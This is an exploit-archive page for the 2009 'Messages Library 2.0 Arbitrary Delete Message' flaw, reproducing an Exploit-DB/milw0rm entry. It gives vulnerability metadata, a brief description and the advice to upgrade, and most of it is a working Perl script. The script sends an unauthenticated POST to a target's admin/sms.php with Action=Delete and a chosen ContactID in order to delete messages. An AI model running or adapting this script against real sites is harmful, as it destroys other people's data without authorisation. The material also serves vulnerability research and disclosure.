Messages Library 2.0 - exploit.company

vendor:

Messages Library 2.0

by:

Stack

7,5

CVSS

HIGH

Arbitrary Delete Message

CWE

Product Name: Messages Library 2.0

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Messages Library 2.0 <= Arbitrary Delete Message

This exploit allows an attacker to delete arbitrary messages from the Messages Library 2.0 application. The exploit requires the attacker to know the ContactID of the message they wish to delete. The exploit is achieved by sending a POST request to the sms.php file with the Action parameter set to Delete and the ID parameter set to the ContactID of the message to be deleted.

Mitigation:

Upgrade to the latest version of Messages Library 2.0

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
#  Messages Library 2.0 <=  Arbitrary Delete Message
########################################
#[*] Founded &  Exploited by : Stack
########################################
print "\t\t############################################################\n\n";
print "\t\t#   Messages Library 2.0 <=  Arbitrary Delete Message      #\n\n";
print "\t\t#                          by Stack                        #\n\n";
print "\t\t############################################################\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
print "\n[!] ContactID : ";
chomp(my $id=<STDIN>);
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id."";
$res = $b->request(HTTP::Request->new(POST=>$host));
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Message Deleted \n";

# milw0rm.com [2009-07-01]